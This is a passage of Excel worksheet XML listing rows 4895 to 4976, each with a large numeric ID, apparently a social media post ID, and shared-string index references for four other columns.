        <v>1.2343939475915799E+18</v>
      </c>
      <c r="B4895" t="s">
        <v>12151</v>
      </c>
      <c r="C4895" t="s">
        <v>1</v>
      </c>
      <c r="D4895" t="s">
        <v>12152</v>
      </c>
      <c r="E4895" t="s">
        <v>12153</v>
      </c>
    </row>
    <row r="4896" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4896">
        <v>1.2343935162282801E+18</v>
      </c>
      <c r="B4896" t="s">
        <v>12154</v>
      </c>
      <c r="C4896" t="s">
        <v>1</v>
      </c>
      <c r="D4896" t="s">
        <v>12155</v>
      </c>
      <c r="E4896" t="s">
        <v>57</v>
      </c>
    </row>
    <row r="4897" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4897">
        <v>1.2343930061674801E+18</v>
      </c>
      <c r="B4897" t="s">
        <v>12156</v>
      </c>
      <c r="C4897" t="s">
        <v>1</v>
      </c>
      <c r="D4897" t="s">
        <v>12157</v>
      </c>
      <c r="E4897" t="s">
        <v>12158</v>
      </c>
    </row>
    <row r="4898" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4898">
        <v>1.2343927642736399E+18</v>
      </c>
      <c r="B4898" t="s">
        <v>12159</v>
      </c>
      <c r="C4898" t="s">
        <v>1</v>
      </c>
      <c r="D4898" t="s">
        <v>12160</v>
      </c>
      <c r="E4898" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="4899" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4899">
        <v>1.2343917743591601E+18</v>
      </c>
      <c r="B4899" t="s">
        <v>12161</v>
      </c>
      <c r="C4899" t="s">
        <v>1</v>
      </c>
      <c r="D4899" t="s">
        <v>5</v>
      </c>
      <c r="E4899" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="4900" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4900">
        <v>1.2343912536488E+18</v>
      </c>
      <c r="B4900" t="s">
        <v>12162</v>
      </c>
      <c r="C4900" t="s">
        <v>1</v>
      </c>
      <c r="D4900" t="s">
        <v>12163</v>
      </c>
      <c r="E4900" t="s">
        <v>6166</v>
      </c>
    </row>
    <row r="4901" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4901">
        <v>1.2343909531941399E+18</v>
      </c>
      <c r="B4901" t="s">
        <v>12164</v>
      </c>
      <c r="C4901" t="s">
        <v>1</v>
      </c>
      <c r="D4901" t="s">
        <v>12165</v>
      </c>
      <c r="E4901" t="s">
        <v>1474</v>
      </c>
    </row>
    <row r="4902" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4902">
        <v>1.23439052659981E+18</v>
      </c>
      <c r="B4902" t="s">
        <v>12166</v>
      </c>
      <c r="C4902" t="s">
        <v>1</v>
      </c>
      <c r="D4902" t="s">
        <v>12167</v>
      </c>
      <c r="E4902" t="s">
        <v>12168</v>
      </c>
    </row>
    <row r="4903" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4903">
        <v>1.2343894856784799E+18</v>
      </c>
      <c r="B4903" t="s">
        <v>12169</v>
      </c>
      <c r="C4903" t="s">
        <v>1</v>
      </c>
      <c r="D4903" t="s">
        <v>12170</v>
      </c>
      <c r="E4903" t="s">
        <v>12171</v>
      </c>
    </row>
    <row r="4904" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4904">
        <v>1.23438941341475E+18</v>
      </c>
      <c r="B4904" t="s">
        <v>12172</v>
      </c>
      <c r="C4904" t="s">
        <v>1</v>
      </c>
      <c r="D4904" t="s">
        <v>12173</v>
      </c>
      <c r="E4904" t="s">
        <v>12174</v>
      </c>
    </row>
    <row r="4905" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4905">
        <v>1.23438928360099E+18</v>
      </c>
      <c r="B4905" t="s">
        <v>12175</v>
      </c>
      <c r="C4905" t="s">
        <v>1</v>
      </c>
      <c r="D4905" t="s">
        <v>12176</v>
      </c>
      <c r="E4905" t="s">
        <v>1665</v>
      </c>
    </row>
    <row r="4906" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4906">
        <v>1.2343889591633001E+18</v>
      </c>
      <c r="B4906" t="s">
        <v>12177</v>
      </c>
      <c r="C4906" t="s">
        <v>1</v>
      </c>
      <c r="D4906" t="s">
        <v>12178</v>
      </c>
      <c r="E4906" t="s">
        <v>6163</v>
      </c>
    </row>
    <row r="4907" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4907">
        <v>1.23438890453233E+18</v>
      </c>
      <c r="B4907" t="s">
        <v>12179</v>
      </c>
      <c r="C4907" t="s">
        <v>1</v>
      </c>
      <c r="D4907" t="s">
        <v>12180</v>
      </c>
      <c r="E4907" t="s">
        <v>12181</v>
      </c>
    </row>
    <row r="4908" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4908">
        <v>1.2343887582896699E+18</v>
      </c>
      <c r="B4908" t="s">
        <v>12182</v>
      </c>
      <c r="C4908" t="s">
        <v>1</v>
      </c>
      <c r="D4908" t="s">
        <v>12183</v>
      </c>
      <c r="E4908" t="s">
        <v>12184</v>
      </c>
    </row>
    <row r="4909" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4909">
        <v>1.23438842216637E+18</v>
      </c>
      <c r="B4909" t="s">
        <v>12185</v>
      </c>
      <c r="C4909" t="s">
        <v>1</v>
      </c>
      <c r="D4909" t="s">
        <v>12186</v>
      </c>
      <c r="E4909" t="s">
        <v>12187</v>
      </c>
    </row>
    <row r="4910" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4910">
        <v>1.2343882325085199E+18</v>
      </c>
      <c r="B4910" t="s">
        <v>12188</v>
      </c>
      <c r="C4910" t="s">
        <v>1</v>
      </c>
      <c r="D4910" t="s">
        <v>12189</v>
      </c>
      <c r="E4910" t="s">
        <v>12190</v>
      </c>
    </row>
    <row r="4911" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4911">
        <v>1.2343880829605801E+18</v>
      </c>
      <c r="B4911" t="s">
        <v>12191</v>
      </c>
      <c r="C4911" t="s">
        <v>1</v>
      </c>
      <c r="D4911" t="s">
        <v>12192</v>
      </c>
      <c r="E4911" t="s">
        <v>9130</v>
      </c>
    </row>
    <row r="4912" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4912">
        <v>1.2343880814253801E+18</v>
      </c>
      <c r="B4912" t="s">
        <v>12191</v>
      </c>
      <c r="C4912" t="s">
        <v>1</v>
      </c>
      <c r="D4912" t="s">
        <v>12193</v>
      </c>
      <c r="E4912" t="s">
        <v>12194</v>
      </c>
    </row>
    <row r="4913" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4913">
        <v>1.23438806670768E+18</v>
      </c>
      <c r="B4913" t="s">
        <v>12195</v>
      </c>
      <c r="C4913" t="s">
        <v>1</v>
      </c>
      <c r="D4913" t="s">
        <v>12196</v>
      </c>
      <c r="E4913" t="s">
        <v>12197</v>
      </c>
    </row>
    <row r="4914" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4914">
        <v>1.2343875403056799E+18</v>
      </c>
      <c r="B4914" t="s">
        <v>12198</v>
      </c>
      <c r="C4914" t="s">
        <v>1</v>
      </c>
      <c r="D4914" t="s">
        <v>12199</v>
      </c>
      <c r="E4914" t="s">
        <v>12200</v>
      </c>
    </row>
    <row r="4915" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4915">
        <v>1.2343855395052201E+18</v>
      </c>
      <c r="B4915" t="s">
        <v>12201</v>
      </c>
      <c r="C4915" t="s">
        <v>1</v>
      </c>
      <c r="D4915" t="s">
        <v>12202</v>
      </c>
      <c r="E4915" t="s">
        <v>12203</v>
      </c>
    </row>
    <row r="4916" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4916">
        <v>1.23438487588241E+18</v>
      </c>
      <c r="B4916" t="s">
        <v>12204</v>
      </c>
      <c r="C4916" t="s">
        <v>1</v>
      </c>
      <c r="D4916" t="s">
        <v>12205</v>
      </c>
      <c r="E4916" t="s">
        <v>4962</v>
      </c>
    </row>
    <row r="4917" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4917">
        <v>1.23438462620819E+18</v>
      </c>
      <c r="B4917" t="s">
        <v>12206</v>
      </c>
      <c r="C4917" t="s">
        <v>1</v>
      </c>
      <c r="D4917" t="s">
        <v>12207</v>
      </c>
      <c r="E4917" t="s">
        <v>12208</v>
      </c>
    </row>
    <row r="4918" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4918">
        <v>1.2343840538365701E+18</v>
      </c>
      <c r="B4918" t="s">
        <v>12209</v>
      </c>
      <c r="C4918" t="s">
        <v>1</v>
      </c>
      <c r="D4918" t="s">
        <v>12210</v>
      </c>
      <c r="E4918" t="s">
        <v>1200</v>
      </c>
    </row>
    <row r="4919" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4919">
        <v>1.2343840062059799E+18</v>
      </c>
      <c r="B4919" t="s">
        <v>12211</v>
      </c>
      <c r="C4919" t="s">
        <v>1</v>
      </c>
      <c r="D4919" t="s">
        <v>12212</v>
      </c>
      <c r="E4919" t="s">
        <v>12213</v>
      </c>
    </row>
    <row r="4920" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4920">
        <v>1.2343837891551301E+18</v>
      </c>
      <c r="B4920" t="s">
        <v>12214</v>
      </c>
      <c r="C4920" t="s">
        <v>1</v>
      </c>
      <c r="D4920" t="s">
        <v>12215</v>
      </c>
      <c r="E4920" t="s">
        <v>12216</v>
      </c>
    </row>
    <row r="4921" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4921">
        <v>1.2343834827694001E+18</v>
      </c>
      <c r="B4921" t="s">
        <v>12217</v>
      </c>
      <c r="C4921" t="s">
        <v>1</v>
      </c>
      <c r="D4921" t="s">
        <v>12218</v>
      </c>
      <c r="E4921" t="s">
        <v>12219</v>
      </c>
    </row>
    <row r="4922" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4922">
        <v>1.23438269246208E+18</v>
      </c>
      <c r="B4922" t="s">
        <v>12220</v>
      </c>
      <c r="C4922" t="s">
        <v>1</v>
      </c>
      <c r="D4922" t="s">
        <v>12221</v>
      </c>
      <c r="E4922" t="s">
        <v>10827</v>
      </c>
    </row>
    <row r="4923" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4923">
        <v>1.2343824562680801E+18</v>
      </c>
      <c r="B4923" t="s">
        <v>12222</v>
      </c>
      <c r="C4923" t="s">
        <v>1</v>
      </c>
      <c r="D4923" t="s">
        <v>12223</v>
      </c>
      <c r="E4923" t="s">
        <v>12224</v>
      </c>
    </row>
    <row r="4924" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4924">
        <v>1.23438170801261E+18</v>
      </c>
      <c r="B4924" t="s">
        <v>12225</v>
      </c>
      <c r="C4924" t="s">
        <v>1</v>
      </c>
      <c r="D4924" t="s">
        <v>12226</v>
      </c>
      <c r="E4924" t="s">
        <v>12227</v>
      </c>
    </row>
    <row r="4925" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4925">
        <v>1.2343811927131599E+18</v>
      </c>
      <c r="B4925" t="s">
        <v>12228</v>
      </c>
      <c r="C4925" t="s">
        <v>1</v>
      </c>
      <c r="D4925" t="s">
        <v>12229</v>
      </c>
      <c r="E4925" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="4926" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4926">
        <v>1.23438072049747E+18</v>
      </c>
      <c r="B4926" t="s">
        <v>12230</v>
      </c>
      <c r="C4926" t="s">
        <v>1</v>
      </c>
      <c r="D4926" t="s">
        <v>12231</v>
      </c>
      <c r="E4926" t="s">
        <v>12232</v>
      </c>
    </row>
    <row r="4927" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4927">
        <v>1.2343804276762199E+18</v>
      </c>
      <c r="B4927" t="s">
        <v>12233</v>
      </c>
      <c r="C4927" t="s">
        <v>1</v>
      </c>
      <c r="D4927" t="s">
        <v>12234</v>
      </c>
      <c r="E4927" t="s">
        <v>12235</v>
      </c>
    </row>
    <row r="4928" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4928">
        <v>1.23437990026351E+18</v>
      </c>
      <c r="B4928" t="s">
        <v>12236</v>
      </c>
      <c r="C4928" t="s">
        <v>1</v>
      </c>
      <c r="D4928" t="s">
        <v>12237</v>
      </c>
      <c r="E4928" t="s">
        <v>12238</v>
      </c>
    </row>
    <row r="4929" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4929">
        <v>1.2343774474133801E+18</v>
      </c>
      <c r="B4929" t="s">
        <v>12239</v>
      </c>
      <c r="C4929" t="s">
        <v>1</v>
      </c>
      <c r="D4929" t="s">
        <v>12240</v>
      </c>
      <c r="E4929" t="s">
        <v>12241</v>
      </c>
    </row>
    <row r="4930" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4930">
        <v>1.23437731991917E+18</v>
      </c>
      <c r="B4930" t="s">
        <v>12242</v>
      </c>
      <c r="C4930" t="s">
        <v>1</v>
      </c>
      <c r="D4930" t="s">
        <v>12243</v>
      </c>
      <c r="E4930" t="s">
        <v>12244</v>
      </c>
    </row>
    <row r="4931" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4931">
        <v>1.23437699292303E+18</v>
      </c>
      <c r="B4931" t="s">
        <v>12245</v>
      </c>
      <c r="C4931" t="s">
        <v>1</v>
      </c>
      <c r="D4931" t="s">
        <v>12246</v>
      </c>
      <c r="E4931" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="4932" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4932">
        <v>1.23437661155587E+18</v>
      </c>
      <c r="B4932" t="s">
        <v>12247</v>
      </c>
      <c r="C4932" t="s">
        <v>1</v>
      </c>
      <c r="D4932" t="s">
        <v>12248</v>
      </c>
      <c r="E4932" t="s">
        <v>12249</v>
      </c>
    </row>
    <row r="4933" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4933">
        <v>1.2343739559197299E+18</v>
      </c>
      <c r="B4933" t="s">
        <v>12250</v>
      </c>
      <c r="C4933" t="s">
        <v>1</v>
      </c>
      <c r="D4933" t="s">
        <v>12251</v>
      </c>
      <c r="E4933" t="s">
        <v>12252</v>
      </c>
    </row>
    <row r="4934" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4934">
        <v>1.2343732169797701E+18</v>
      </c>
      <c r="B4934" t="s">
        <v>12253</v>
      </c>
      <c r="C4934" t="s">
        <v>1</v>
      </c>
      <c r="D4934" t="s">
        <v>12254</v>
      </c>
      <c r="E4934" t="s">
        <v>3626</v>
      </c>
    </row>
    <row r="4935" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4935">
        <v>1.2343730299725901E+18</v>
      </c>
      <c r="B4935" t="s">
        <v>12255</v>
      </c>
      <c r="C4935" t="s">
        <v>1</v>
      </c>
      <c r="D4935" t="s">
        <v>12256</v>
      </c>
      <c r="E4935" t="s">
        <v>12257</v>
      </c>
    </row>
    <row r="4936" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4936">
        <v>1.2343730299306299E+18</v>
      </c>
      <c r="B4936" t="s">
        <v>12255</v>
      </c>
      <c r="C4936" t="s">
        <v>1</v>
      </c>
      <c r="D4936" t="s">
        <v>12258</v>
      </c>
      <c r="E4936" t="s">
        <v>12259</v>
      </c>
    </row>
    <row r="4937" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4937">
        <v>1.2343730298341601E+18</v>
      </c>
      <c r="B4937" t="s">
        <v>12255</v>
      </c>
      <c r="C4937" t="s">
        <v>1</v>
      </c>
      <c r="D4937" t="s">
        <v>12260</v>
      </c>
      <c r="E4937" t="s">
        <v>12261</v>
      </c>
    </row>
    <row r="4938" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4938">
        <v>1.23437302964128E+18</v>
      </c>
      <c r="B4938" t="s">
        <v>12255</v>
      </c>
      <c r="C4938" t="s">
        <v>1</v>
      </c>
      <c r="D4938" t="s">
        <v>12262</v>
      </c>
      <c r="E4938" t="s">
        <v>12263</v>
      </c>
    </row>
    <row r="4939" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4939">
        <v>1.2343729324005299E+18</v>
      </c>
      <c r="B4939" t="s">
        <v>12264</v>
      </c>
      <c r="C4939" t="s">
        <v>1</v>
      </c>
      <c r="D4939" t="s">
        <v>12265</v>
      </c>
      <c r="E4939" t="s">
        <v>10910</v>
      </c>
    </row>
    <row r="4940" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4940">
        <v>1.2343729133456399E+18</v>
      </c>
      <c r="B4940" t="s">
        <v>12266</v>
      </c>
      <c r="C4940" t="s">
        <v>1</v>
      </c>
      <c r="D4940" t="s">
        <v>12267</v>
      </c>
      <c r="E4940" t="s">
        <v>12268</v>
      </c>
    </row>
    <row r="4941" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4941">
        <v>1.2343723753885701E+18</v>
      </c>
      <c r="B4941" t="s">
        <v>12269</v>
      </c>
      <c r="C4941" t="s">
        <v>1</v>
      </c>
      <c r="D4941" t="s">
        <v>12270</v>
      </c>
      <c r="E4941" t="s">
        <v>486</v>
      </c>
    </row>
    <row r="4942" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4942">
        <v>1.2343718745466801E+18</v>
      </c>
      <c r="B4942" t="s">
        <v>12271</v>
      </c>
      <c r="C4942" t="s">
        <v>1</v>
      </c>
      <c r="D4942" t="s">
        <v>12272</v>
      </c>
      <c r="E4942" t="s">
        <v>12273</v>
      </c>
    </row>
    <row r="4943" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4943">
        <v>1.2343684666494001E+18</v>
      </c>
      <c r="B4943" t="s">
        <v>12274</v>
      </c>
      <c r="C4943" t="s">
        <v>1</v>
      </c>
      <c r="D4943" t="s">
        <v>12275</v>
      </c>
      <c r="E4943" t="s">
        <v>12276</v>
      </c>
    </row>
    <row r="4944" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4944">
        <v>1.2343684425741E+18</v>
      </c>
      <c r="B4944" t="s">
        <v>12277</v>
      </c>
      <c r="C4944" t="s">
        <v>1</v>
      </c>
      <c r="D4944" t="s">
        <v>12278</v>
      </c>
      <c r="E4944" t="s">
        <v>6199</v>
      </c>
    </row>
    <row r="4945" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4945">
        <v>1.2343665873915699E+18</v>
      </c>
      <c r="B4945" t="s">
        <v>12279</v>
      </c>
      <c r="C4945" t="s">
        <v>1</v>
      </c>
      <c r="D4945" t="s">
        <v>12280</v>
      </c>
      <c r="E4945" t="s">
        <v>7141</v>
      </c>
    </row>
    <row r="4946" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4946">
        <v>1.2343664742165399E+18</v>
      </c>
      <c r="B4946" t="s">
        <v>12281</v>
      </c>
      <c r="C4946" t="s">
        <v>1</v>
      </c>
      <c r="D4946" t="s">
        <v>12282</v>
      </c>
      <c r="E4946" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="4947" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4947">
        <v>1.2343663363037901E+18</v>
      </c>
      <c r="B4947" t="s">
        <v>12283</v>
      </c>
      <c r="C4947" t="s">
        <v>1</v>
      </c>
      <c r="D4947" t="s">
        <v>12284</v>
      </c>
      <c r="E4947" t="s">
        <v>12285</v>
      </c>
    </row>
    <row r="4948" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4948">
        <v>1.23436506498077E+18</v>
      </c>
      <c r="B4948" t="s">
        <v>12286</v>
      </c>
      <c r="C4948" t="s">
        <v>1</v>
      </c>
      <c r="D4948" t="s">
        <v>12287</v>
      </c>
      <c r="E4948" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="4949" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4949">
        <v>1.23436420489677E+18</v>
      </c>
      <c r="B4949" t="s">
        <v>12288</v>
      </c>
      <c r="C4949" t="s">
        <v>1</v>
      </c>
      <c r="D4949" t="s">
        <v>12289</v>
      </c>
      <c r="E4949" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="4950" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4950">
        <v>1.2343636563992801E+18</v>
      </c>
      <c r="B4950" t="s">
        <v>12290</v>
      </c>
      <c r="C4950" t="s">
        <v>1</v>
      </c>
      <c r="D4950" t="s">
        <v>12291</v>
      </c>
      <c r="E4950" t="s">
        <v>12292</v>
      </c>
    </row>
    <row r="4951" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4951">
        <v>1.2343634693039601E+18</v>
      </c>
      <c r="B4951" t="s">
        <v>12293</v>
      </c>
      <c r="C4951" t="s">
        <v>1</v>
      </c>
      <c r="D4951" t="s">
        <v>12294</v>
      </c>
      <c r="E4951" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="4952" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4952">
        <v>1.23436234115379E+18</v>
      </c>
      <c r="B4952" t="s">
        <v>12295</v>
      </c>
      <c r="C4952" t="s">
        <v>1</v>
      </c>
      <c r="D4952" t="s">
        <v>12296</v>
      </c>
      <c r="E4952" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="4953" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4953">
        <v>1.2343617921152E+18</v>
      </c>
      <c r="B4953" t="s">
        <v>12297</v>
      </c>
      <c r="C4953" t="s">
        <v>1</v>
      </c>
      <c r="D4953" t="s">
        <v>12298</v>
      </c>
      <c r="E4953" t="s">
        <v>12299</v>
      </c>
    </row>
    <row r="4954" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4954">
        <v>1.2343615587692401E+18</v>
      </c>
      <c r="B4954" t="s">
        <v>12300</v>
      </c>
      <c r="C4954" t="s">
        <v>1</v>
      </c>
      <c r="D4954" t="s">
        <v>12301</v>
      </c>
      <c r="E4954" t="s">
        <v>3078</v>
      </c>
    </row>
    <row r="4955" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4955">
        <v>1.23436079125362E+18</v>
      </c>
      <c r="B4955" t="s">
        <v>12302</v>
      </c>
      <c r="C4955" t="s">
        <v>1</v>
      </c>
      <c r="D4955" t="s">
        <v>12303</v>
      </c>
      <c r="E4955" t="s">
        <v>583</v>
      </c>
    </row>
    <row r="4956" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4956">
        <v>1.2343601074897201E+18</v>
      </c>
      <c r="B4956" t="s">
        <v>12304</v>
      </c>
      <c r="C4956" t="s">
        <v>1</v>
      </c>
      <c r="D4956" t="s">
        <v>12305</v>
      </c>
      <c r="E4956" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="4957" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4957">
        <v>1.2343597863529001E+18</v>
      </c>
      <c r="B4957" t="s">
        <v>12306</v>
      </c>
      <c r="C4957" t="s">
        <v>1</v>
      </c>
      <c r="D4957" t="s">
        <v>12307</v>
      </c>
      <c r="E4957" t="s">
        <v>12308</v>
      </c>
    </row>
    <row r="4958" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4958">
        <v>1.23435959514702E+18</v>
      </c>
      <c r="B4958" t="s">
        <v>12309</v>
      </c>
      <c r="C4958" t="s">
        <v>1</v>
      </c>
      <c r="D4958" t="s">
        <v>12310</v>
      </c>
      <c r="E4958" t="s">
        <v>3771</v>
      </c>
    </row>
    <row r="4959" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4959">
        <v>1.23435944198355E+18</v>
      </c>
      <c r="B4959" t="s">
        <v>12311</v>
      </c>
      <c r="C4959" t="s">
        <v>1</v>
      </c>
      <c r="D4959" t="s">
        <v>12312</v>
      </c>
      <c r="E4959" t="s">
        <v>6757</v>
      </c>
    </row>
    <row r="4960" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4960">
        <v>1.23435925982509E+18</v>
      </c>
      <c r="B4960" t="s">
        <v>12313</v>
      </c>
      <c r="C4960" t="s">
        <v>1</v>
      </c>
      <c r="D4960" t="s">
        <v>12314</v>
      </c>
      <c r="E4960" t="s">
        <v>12315</v>
      </c>
    </row>
    <row r="4961" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4961">
        <v>1.2343590939487501E+18</v>
      </c>
      <c r="B4961" t="s">
        <v>12316</v>
      </c>
      <c r="C4961" t="s">
        <v>1</v>
      </c>
      <c r="D4961" t="s">
        <v>12317</v>
      </c>
      <c r="E4961" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="4962" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4962">
        <v>1.23435895523053E+18</v>
      </c>
      <c r="B4962" t="s">
        <v>12318</v>
      </c>
      <c r="C4962" t="s">
        <v>1</v>
      </c>
      <c r="D4962" t="s">
        <v>12319</v>
      </c>
      <c r="E4962" t="s">
        <v>12320</v>
      </c>
    </row>
    <row r="4963" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4963">
        <v>1.23435881301842E+18</v>
      </c>
      <c r="B4963" t="s">
        <v>12321</v>
      </c>
      <c r="C4963" t="s">
        <v>1</v>
      </c>
      <c r="D4963" t="s">
        <v>12322</v>
      </c>
      <c r="E4963" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="4964" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4964">
        <v>1.2343581169066601E+18</v>
      </c>
      <c r="B4964" t="s">
        <v>12323</v>
      </c>
      <c r="C4964" t="s">
        <v>1</v>
      </c>
      <c r="D4964" t="s">
        <v>12324</v>
      </c>
      <c r="E4964" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="4965" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4965">
        <v>1.23435793330513E+18</v>
      </c>
      <c r="B4965" t="s">
        <v>12325</v>
      </c>
      <c r="C4965" t="s">
        <v>1</v>
      </c>
      <c r="D4965" t="s">
        <v>12326</v>
      </c>
      <c r="E4965" t="s">
        <v>12327</v>
      </c>
    </row>
    <row r="4966" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4966">
        <v>1.2343577876537001E+18</v>
      </c>
      <c r="B4966" t="s">
        <v>12328</v>
      </c>
      <c r="C4966" t="s">
        <v>1</v>
      </c>
      <c r="D4966" t="s">
        <v>12329</v>
      </c>
      <c r="E4966" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="4967" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4967">
        <v>1.2343550636882501E+18</v>
      </c>
      <c r="B4967" t="s">
        <v>12330</v>
      </c>
      <c r="C4967" t="s">
        <v>1</v>
      </c>
      <c r="D4967" t="s">
        <v>12331</v>
      </c>
      <c r="E4967" t="s">
        <v>12332</v>
      </c>
    </row>
    <row r="4968" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4968">
        <v>1.2343545023307899E+18</v>
      </c>
      <c r="B4968" t="s">
        <v>12333</v>
      </c>
      <c r="C4968" t="s">
        <v>1</v>
      </c>
      <c r="D4968" t="s">
        <v>12334</v>
      </c>
      <c r="E4968" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="4969" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4969">
        <v>1.23435397156271E+18</v>
      </c>
      <c r="B4969" t="s">
        <v>12335</v>
      </c>
      <c r="C4969" t="s">
        <v>1</v>
      </c>
      <c r="D4969" t="s">
        <v>12336</v>
      </c>
      <c r="E4969" t="s">
        <v>12337</v>
      </c>
    </row>
    <row r="4970" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4970">
        <v>1.2343536944071301E+18</v>
      </c>
      <c r="B4970" t="s">
        <v>12338</v>
      </c>
      <c r="C4970" t="s">
        <v>1</v>
      </c>
      <c r="D4970" t="s">
        <v>12339</v>
      </c>
      <c r="E4970" t="s">
        <v>9275</v>
      </c>
    </row>
    <row r="4971" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4971">
        <v>1.23435350805422E+18</v>
      </c>
      <c r="B4971" t="s">
        <v>12340</v>
      </c>
      <c r="C4971" t="s">
        <v>1</v>
      </c>
      <c r="D4971" t="s">
        <v>12341</v>
      </c>
      <c r="E4971" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="4972" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4972">
        <v>1.23435313236641E+18</v>
      </c>
      <c r="B4972" t="s">
        <v>12342</v>
      </c>
      <c r="C4972" t="s">
        <v>1</v>
      </c>
      <c r="D4972" t="s">
        <v>12343</v>
      </c>
      <c r="E4972" t="s">
        <v>12344</v>
      </c>
    </row>
    <row r="4973" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4973">
        <v>1.2343531201523899E+18</v>
      </c>
      <c r="B4973" t="s">
        <v>12345</v>
      </c>
      <c r="C4973" t="s">
        <v>1</v>
      </c>
      <c r="D4973" t="s">
        <v>12346</v>
      </c>
      <c r="E4973" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="4974" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4974">
        <v>1.23435302097811E+18</v>
      </c>
      <c r="B4974" t="s">
        <v>12347</v>
      </c>
      <c r="C4974" t="s">
        <v>1</v>
      </c>
      <c r="D4974" t="s">
        <v>12348</v>
      </c>
      <c r="E4974" t="s">
        <v>5608</v>
      </c>
    </row>
    <row r="4975" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4975">
        <v>1.2343527112079301E+18</v>
      </c>
      <c r="B4975" t="s">
        <v>12349</v>
      </c>
      <c r="C4975" t="s">
        <v>1</v>
      </c>
      <c r="D4975" t="s">
        <v>12350</v>
      </c>
      <c r="E4975" t="s">
        <v>9302</v>
      </c>
    </row>
    <row r="4976" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A4976">
        <v>1.23435227697567E+18</v>
      </c>
      <c r="B4976" t="s">
        <v>12351</v>
      </c>
      <c r="C4976" t="s">
